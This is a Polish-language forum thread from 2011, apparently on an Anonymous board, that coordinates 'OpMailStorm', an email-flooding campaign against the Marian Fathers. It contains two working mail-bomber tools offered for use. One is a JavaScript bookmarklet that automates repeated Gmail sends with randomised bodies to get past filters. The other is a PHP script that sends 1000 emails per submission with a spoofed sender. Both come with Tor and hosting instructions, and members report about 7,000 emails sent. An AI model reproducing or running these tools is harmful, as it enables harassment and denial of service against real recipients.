Customize

OpMailStorm

Discussion in 'Anonimowi i Wolność Słowa' started by Anonymous, Dec 27, 2011.

1. Anonimowy Member

Raczej chodziło o to, żeby dostęp do czytania mieli tylko zarejestrowani użytkownicy, więc żeby coś przeczytać wystarczyłoby się zarejestrować (tak jak jest teraz z pisaniem).
  2. Zekdarrath Member

Też właśnie o tym myślałem, chciałem założyć osobny temat, ale uprzedziliście mnie. Sądzę, iż za dużo informacji przecieka i ludzie spoza Anonymous wiedzą zbyt dużo.
  3. Anonymous Member

Anonimowym może zostać każdy nawet taki zakłamany dziennikarz, niestety ;/
  4. Anonymous Member

Za bardzo martwimy się trollami i tym, co robią na YT, wykopie czy na czym tam jeszcze. Po prostu róbmy swoje; gdy będziemy bardziej znani, a ludzie będą znali nasz prawdziwy cel, trolle nic nie będą mogły zrobić.
  5. RainbowSix Member

No dokładnie, chodzi po prostu opcję: aby przeglądać forum zarejestruj się. Ale faktem jest, że faktycznie nie ma sensu przejmować się oszołomami z chanów tylko robić swoje.
  6. Xaosuser Member

A wy nadal swoje. Tak więc ode mnie, to:

bo nie chce mi się powtarzać ^^'
  7. Gej_Folks Member

Tak tylko sobie pozwolę wtrącić jak już mój luby się namęczył. Skoro zgadzamy się z wiadomym filmikiem, to wystawmy go pod swoim sztandarem na naszych kontach, zamiast aprobować niepewne fake-konta ;-)

8. Anonymous Member

a ja uwazam że test jest dobrym rozwiązaniem, test powinien być ograniczony czasowo, czyli jak robiła moja babka od geografi w LO przez 3 tygodnie dyktowała materiał a po 3 tygodniach robiła sprawdzian: na kserówce było 15 zdan z wykropkowanymi miejscami i trzeba było w nie coś wpisać, na test był przeznaczony czas 30 sekund i to było rozwiązanie bo nawet jak miałeś sćiągi to nie ściągnąłeś bo nie było czasu, btw ja to się obsram na tym waszym tescie ale za pare lat... pracuję nad tym, powodzenia
    oczywiście że zamknijcie forum dla niektórych tematów planowania akcji, bo ja se tu wszedłem z wiadomości google, poźniej na chyba wolnemedia.net
    i tam był link do forum, a to tak raczej nie powinno być, jest stronka i to wystarczy, są kontakty itp. to i tak dużo, zróbcie test i po kłopcie, planowanie akcji tak na otwartym forum to może być szkodliwe bo ktoś się moze zabezpieczyć
  9. IMarcin Member

Test byłby niezgodny z samą ideą, zresztą nie jest to tylko nasze forum. W bardziej hmm... "tajnych" akcjach zainteresowany może zebrać daną grupę osób przez wiadomości prywatne i wtedy umówić się np na irca
  10. duch Member

Maile z tymczasowych skrzynek pocztowych można łatwo odfiltrować poprzez ich domeny. Najbardziej popularną domeną, którą ciężko zablokować jest gmail.

Węzły TOR ze względu na spam mają blokadę na port pocztowy, więc pisanie programu pod protokół SMTP odpada.

Instrukcja obsługi bombera: (napisany w celach edukacyjnych, korzystanie z niego na własną odpowiedzialność)
    1.Uruchamiamy TOR w przeglądarce http
    2.Tworzymy konto Gmail
    3.Logujemy się na konto i podczas logowania klikamy na dole "Załaduj podstawowy widok HTML"
    4.Klikamy "Utwórz wiadomość"
    5.W okienko adresu przeglądarki wklejamy kod
    Code:
    javascript:var chars=" #    # ######      ##  #####  ###### \n #    # #          #  #  #    # #      \n #    # #####    #    # #    # #####  \n # ## # #        ###### #####  #      \n ##  ## #        #    # #  #  #      \n #    # ######    #    # #    # ###### \n                                      \n\n                                                              \n  ##  #    #  ####  #    # #  # #    #  ####  #    #  ####  \n  #  #  ##  # #    # ##  #  # #  ##  ## #    # #    # #      \n #    # # #  # #    # # #  #  #  # ## # #    # #    #  ####  \n ###### #  # # #    # #  # #  #  #    # #    # #    #      # \n #    # #  ## #    # #  ##  #  #    # #    # #    # #    # \n #    # #    #  ####  #    #  #  #    #  ####  ####  ####  \n                                                              \n\n                                                                              \n #    # ######      ##  #####  ######    #      ######  ####  #  ####  #    # \n #    # #          #  #  #    # #        #      #      #    # # #    # ##  # \n #    # #####    #    # #    # #####    #      #####  #      # #    # # #  # \n # ## # #        ###### #####  #        #      #      #  ### # #    # #  # # \n ##  ## #        #    # #  #  #        #      #      #    # # #    # #  ## \n #    # ######    #    # #    # ######    ###### ######  ####  #  ####  #    # \n                                                                              \n\n                                                      \n #    # ######    #####  ####    #    #  ####  ##### \n #    # #        #    # #    #    ##  # #    #  #  \n #    # #####    #    # #    #    # #  # #    #  #  \n # ## # #        #    # #    #    #  # # #    #  #  \n ##  ## #        #    # #    #    #  ## #    #  #  \n #    # ######    #####  ####    #    #  ####    #  \n                                                      \n\n                                            \n ######  ####  #####  ####  # #    # ###### \n #      #    # #    # #    # # #    # #      \n #####  #    # #    # #      # #    # #####  \n #      #    # #####  #  ### # #    # #      \n #      #    # #  #  #    # #  #  #  #      \n #      ####  #    #  ####  #  ##  ###### \n                                            \n\n                                                      \n #    # ######    #####  ####    #    #  ####  ##### \n #    # #        #    # #    #    ##  # #    #  #  \n #    # #####    #    # #    #    # #  # #    #  #  \n # ## # #        #    # #    #    #  # # #    #  #  \n ##  ## #        #    # #    #    #  ## #    #  #  \n #    # ######    #####  ####    #    #  ####    #  \n                                                      \n\n                                          \n ######  ####  #####  ####  ###### ##### \n #      #    # #    # #    # #        #  \n #####  #    # #    # #      #####    #  \n #      #    # #####  #  ### #        #  \n #      #    # #  #  #    # #        #  \n #      ####  #    #  ####  ######  #  \n                                          \n\n                                                          \n ###### #    # #####  ######  ####  #####    #    #  ####  \n #      #  #  #    # #      #    #  #      #    # #      \n #####    ##  #    # #####  #        #      #    #  ####  \n #        ##  #####  #      #        #      #    #      # \n #      #  #  #      #      #    #  #      #    # #    # \n ###### #    # #      ######  ####    #      ####  ####";var panel=document.createElement('div');panel.setAttribute('style','position:fixed;top:0;width:100%');panel.innerHTML='<div style="text-align:center;margin:auto;width:350px;background-color:white"><fieldset><legend>Bomber for Gmail &copy; 2011 |)u(|-|@Anonymous</legend><input type="button" value="start" style="border-width:1px;border-color:red;border-style:dashed;margin:5px;"/><input type="button" value="stop" style="border-width:1px;border-color:red;border-style:dashed;margin:5px;"/>Interval=<input size="1" value="2" style="border-width:1px;border-color:red;border-style:dashed;text-align:right;margin:5px;"/>seconds</fieldset></div>';document.body.appendChild(panel);var send_iframe=document.createElement('iframe');send_iframe.name='send_iframe';document.body.appendChild(send_iframe);var send_form=document.getElementsByTagName('form');for(var i in send_form){if(send_form[i].name=='f'){send_form=send_form[i];break;}}send_form.target='send_iframe';var send=document.getElementsByTagName('input');for(var i in send){if(send[i].value=='Wyślij'){send=send[i];break;}}var send_message=document.getElementsByTagName('textarea');for(var i in send_message){if(send_message[i].name=='body'){send_message=send_message[i];break;}}var send_repeat;function send_go(){send_repeat=window.setTimeout(send_go,panel.childNodes[0].childNodes[0].childNodes[4].value*1000);var chars2=chars.split('');for(var i=0; i<chars2.length; i++)if(chars2[i]=='#')chars2[i]=String.fromCharCode(Math.random()*('Z'.charCodeAt()-'A'.charCodeAt())+'A'.charCodeAt());send_message.value=chars2.join('');send.click();}panel.childNodes[0].childNodes[0].childNodes[1].onclick=send_go;panel.childNodes[0].childNodes[0].childNodes[2].onclick=function(){window.clearTimeout(send_repeat)};void(0);
    i klikamy enter
    6.Wpisujemy adres nadawcy oraz temat - zdanie z popularnych słów, na które nie będą mogli założyć blokadę
    7.Ustawiamy interwał czasowy
    8.Klikamy 'start'

Mam nadzieję, że nie zostanę "hakierem"..hehe :)
    • Like Like x 2
  11. IMarcin Member

A właściwie co z tą operacją? Jaki "następny krok"?
  12. Darth VAnon Member

Wg. mnie powinniśmy wstrzymać się z MailStormem i wymyślić coś innego. Aktualna wersja podawana w mediach mówi, że wg. Bonieckiego intencje są dobre, metoda zła.
  13. Anonymous Member

Dlatego już nie wysyłamy maili, lecz pracujemy nad wiadomościami do ZKM i do polaków.
  14. Zaktualizuj NET FRAMEWORK i jeśli dalej nie będzie działać to spróbuj z tym od adronixa a potem ewen. poszukaj w sieci.

@edit

Aj sorry dopiero teraz doczytałem temat do końca i dowiedziałem się że nie wysyłamy maili :)
  15. ch0m1kX Member

16. insidious999 Member

No to co, wznawiamy akcję ;) Tak przy okazji postanowiłem skleić krótki film z dosyć mocną treścią (na chwilę obecną niepubliczny). Jeżeli Wam odpowiada to można go zamieścić gdzieś tam na profilach "bardziej" oficjalnych. Link do downloadu w dobrej jakości podam oczywiście jeżeli spełni on Wasze wyobrażenia. Cóż, Wasza decyzja, ja tylko proponuję :)

17. Anonymous Member

Ja wciąż nie trawię tego lektora. Nic nie rozumiem z tego bełkotu. Tak samo jak w przypadku pierwszego filmiku.
  18. insidious999 Member

Postaram się to poprawić. Zobaczymy co z tego wyjdzie. Teraz zauważyłem kilka kiepsko brzmiących sformułowań, które też edytuję. Ale macie przynajmniej ogólny zarys mojej propozycji
  19. anon_white Member

Podajcie jakieś terminy...
  20. Jest doprawdy zajebiście nie publicznym filmikiem nikt oprócz nas i dziesiątek trolli które odwiedzają te forum się o nim nie dowie :)
  21. insidious999 Member

Wybacz, innej opcji przekazania go Wam nie było ;) Niepubliczny możecie sobie tłumaczy jak chcecie. @edit. Na chwilę obecną prywatny. Jutro przekażę finalną wersję.
  22. Anonymous Member

Zajrzyj do pierwszego posta...
  23. Anonymous Member

Zmieniłem jeden z terminów z niedziel na soboty. Tak chyba będzie wygodniej, bo w niedzielę lekcje trzeba odrabiać, takie tam...

Zna ktoś jakiegoś mailbombera do o2 albo wp? W ogóle proponuję, żeby, jeśli ktoś zna jakiegoś dobrego mailbombera, polecił go tutaj.
  24. Anonymous Member

UWAGA
    WSZYSTKO WYKONUJEMY PRZEZ TOR'A

1. Zakładamy konto na http://000webhost.com
    2. tworzymy plik tekstowy
    3. Wklejamy ten kod:
    Code:
    <?php
    //Copy Righted Waffles./scheols
    $hackedemail = $_POST['emailhacked'];
    if(isset($_POST['hack'])){
    $hack = 1;
    $user = "Anonymous";
    while($hack <= 1000){
    mail($hackedemail,"Oddajcie Glos Ksiedzu Bonieckiemu","Oddajcie Glos Ksiedzu Bonieckiemu", "From: " ."Anonymous. - ". $user. "<" . $hackedemail . ">\n");
    echo "Hacked";
    $hack++;
    }
    }elseif(!isset($_POST['hack'])){
    ?>
    <form method='post'>
    <input type='text' name='emailhacked'><br>
    <input type='submit' name='hack' value='Hack Person'>
    </form>
    <? } ?>
    4. Zapisujemy jako plik index.php
    5. Logujemy się do FTP serwera przez panel admina
    6. usuwamy całą zawartość w public_html
    7. uploadujemy nasz index.php
    8. wchodzimy na stronę którą utworzyliśmy
    9. Wpisujemy adres marianów
    10. Czekamy aż skrypt wykona za nas operację wysłania 1000 mail
    11. Cieszymy się z satysfakcji :)

• Like Like x 6
  25. Anonymous Member

FIFY
  26. Anonimowy Member

Mam coś podobnego, ale nie muszę wpisywać adresu marianów. Każdy darmowy hosting ma chyba ograniczenie na funkcję mail :/
  27. Anonymous Member

Tutaj akurat skrypt wysyła zapytanie do jakiegoś niemieckiego serwera zaraz zobaczę jak działa to na webhoscie spamując swój adres :>
  28. Anonymous Member

@@ Tak jak myślałem działa świetnie

:confused:
  29. Anonymous Member

30. Anonymous Member

Gdyby kupić serwer przykładowo na proserwer.pl ograniczenie mogło by zniknąć, jeśli ktoś jest chętny cena jakiegoś małego serwera jest już od ~2zł smsem
  31. Anonymous Member

znalazłem dobry darmowy hosting który nie zablokował mi konta po wysłaniu jednej serii maili "http://cba.pl"
  32. anon_white Member

Sorki... Nie wiedziałem, że stosujemy się do tych samych terminów... ;D
  33. Po co smsem ? Jak jest 2zł smsem to pewnie 1 przelewem.
  34. IMarcin Member

naprawdę 1zł robi ci różnicę
  35. Anonymous Member

Dokładnie na proserwer.pl kosztuje 3zł smsem płacimy około 3,64 :)

36. Uwierz mi że płacenie kartą bądź przelewem jest wygodniejsze od przepisywania kodów czekania na jakieś smsy zwrotne, a jeszcze do tego jest tańsze o pieprzoną złotówke. Denerwuje mnie takie myślenie "co to za różnica 1 w te czy w te" chodzi o pierdoloną zasade że jak mam możliwość kupić taniej to kupuje taniej. A więc odpowiem Ci jeszcze raz tak pierdolona złotówka robi mi różnice. O np. tu masz liste 231 osób które usieszą się z tej pierdolonej złotówki. Ale co to tobie za różnica pewnie tatuś płaci rachunki za telefon i pokrywa twoje smsy na anonowy hosting do spamowania zakonu księży marianów.
  37. IMarcin Member

no i gdzie ta lista?
  38. Anonymous Member

Poszukaj kursorem :p
  39. Anonymous Member

kliknij w ". tu masz liste" w poście numerka
  40. Anonymous Member

A więc statystyki z dzisiejszej akcji:
    około 7 tysięcy maili wysłanych (pierwsze 6tysięcy 5 minut przed 18 ) ;)

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins